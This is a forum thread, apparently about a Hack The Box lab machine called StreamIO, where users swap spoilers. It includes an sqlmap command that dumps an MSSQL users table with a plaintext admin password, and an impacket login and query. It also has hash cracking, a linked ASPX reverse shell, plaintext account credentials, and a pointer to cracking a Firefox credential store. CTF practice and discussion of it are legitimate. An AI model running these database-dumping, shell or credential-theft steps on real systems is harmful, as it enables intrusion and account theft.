(June 5, 2022, 02:25 PM)karhu Wrote:

(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.

So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.

You need db_admin not db_user for streamio_backup database.

Find the creds in index.php, forward port, do 

sqlmap -d mssql://db_admin:'B1@hx31234567890'@localhost:1433/streamio_backup --dump -D users

to dump users table. crack the hash to get nikk37 and connect with winrm.

(June 5, 2022, 02:31 PM)loge23 Wrote:

(June 5, 2022, 02:25 PM)karhu Wrote:

(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.

So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.

You need db_admin not db_user for streamio_backup database.

Find the creds in index.php, forward port, do 

sqlmap -d mssql://db_admin:'B1@hx31234567890'@localhost:1433/streamio_backup --dump -D users

to dump users table. crack the hash to get nikk37 and connect with winrm.

I can't believe I missed db_admin in index.php.  :dodgy: Thanks!

someone saying that we can use yoshihide user to privilege escalation (for administrator)

he gave me this hint
saying that it is unintended way to do with web user yoshihide

Aspx + iis gives you more
Hint aspx is different
You can make one

i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't gave me Administrator gave me same yoshihide user shell

Hey, I'm working on privesc, I was wondering if slack.streamio.htb was unreachable for everyone or if it was just me

(June 5, 2022, 06:05 PM)jon01 Wrote:

(June 5, 2022, 02:31 PM)loge23 Wrote:

(June 5, 2022, 02:25 PM)karhu Wrote:

(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.

So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.

You need db_admin not db_user for streamio_backup database.

Find the creds in index.php, forward port, do 

sqlmap -d mssql://db_admin:'B1@hx31234567890'@localhost:1433/streamio_backup --dump -D users

to dump users table. crack the hash to get nikk37 and connect with winrm.

it giving me error

I used this script: https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

(June 4, 2022, 09:04 PM)dude4695 Wrote: user = yoshihide
pass = '66boysandgirls..'

How to crack the hash to that pass? I try rockyou, bruteforce and online services.

(June 5, 2022, 06:34 PM)Peter Wrote:

(June 4, 2022, 09:04 PM)dude4695 Wrote: user = yoshihide
pass = '66boysandgirls..'

How to crack the hash to that pass? I try rockyou, bruteforce and online services.

https://crackstation.net/

(June 5, 2022, 06:51 PM)jon01 Wrote:

(June 5, 2022, 06:40 PM)Exa Wrote:

(June 5, 2022, 06:34 PM)Peter Wrote:

(June 4, 2022, 09:04 PM)dude4695 Wrote: user = yoshihide
pass = '66boysandgirls..'

How to crack the hash to that pass? I try rockyou, bruteforce and online services.

https://crackstation.net/

can u tell me how did u do that via impacket bcse i am not geeting nikk hash by dumping users

python mssqlclient.py 'db_admin:#########'@127.0.0.1 -port 1433
then
use streamio_backup;
select * from users;

Is there any way to dump the database quicker, time-based one in login page taking forever?

https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

crack C:\Users
ikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db